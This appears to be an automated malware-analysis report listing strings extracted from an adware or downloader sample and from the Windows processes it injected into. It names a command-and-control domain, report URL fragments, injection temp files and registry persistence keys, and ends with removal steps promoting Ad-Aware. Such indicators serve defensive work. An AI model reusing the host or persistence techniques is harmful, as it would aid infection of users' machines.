_Label_Url_
Wininet.dll
ntdll.dll
C:\Windows\TEMP\INJ98A6.tmp
Citizen_Cope.mp3
1340951093
C:\Download
5.5.4
cubeload.ru
request/report?
&key=
User-Agent: /Content-Type: application/x-www-form-urlencoded
\\.\PhysicalDrive
ÞSKTOP%
%DOWNLAODS%
windows
downloads!hXXp://megadowl.com/terms-ru.html
HKLM\Software\WineYHKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice\ProgIdNHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\regexp:.*\DisplayName
file_url
file_url_domain
send_report_type
reg_key
ReportStart failed
ReportClose failed
ReportFinish failed
ReportComponent failed
by url:
Failed executing file:
report_delay
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS?HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version
. File URL:
HKEY_CURRENT_USER\Software\Wine HKEY_LOCAL_MACHINE\Software\Wine,SOFTWARE\Microsoft\Windows NT\CurrentVersion
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]
iexplore.exe_2100:
.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... ))
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421
iexplore.exe_1952:
.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... ))
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421
SearchProtocolHost.exe_552:
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610
SearchFilterHost.exe_3076:
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610
Explorer.EXE_520_rwx_00BC0000_00001000:
C:\Windows\TEMP\INJ8027.tmp
Explorer.EXE_520_rwx_00BD0000_00001000:
C:\Windows\TEMP\INJ98A6.tmp
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
INJ8027.tmp:3744
VRT7944.tmp:3276
VRT903E.tmp:2244
- Delete the original Virus file.
- Delete or disinfect the following files created/modified by the Virus:
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\normal_bg[1].jpg (1160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\appImg[1].jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\nvlinfad[1] (630 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\Default[1] (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\toccolor[1] (522 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\icw[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IBPSKBRA\icwhd2[1] (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\icw[1] (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IBPSKBRA\hm_globe[1] (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\linefade_hrz[1] (85 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\arrow_dwn[1] (49 bytes)
C:\Windows\Temp\INJ8027.tmp (1 bytes)
C:\Windows\Temp\INJ98A6.tmp (1 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.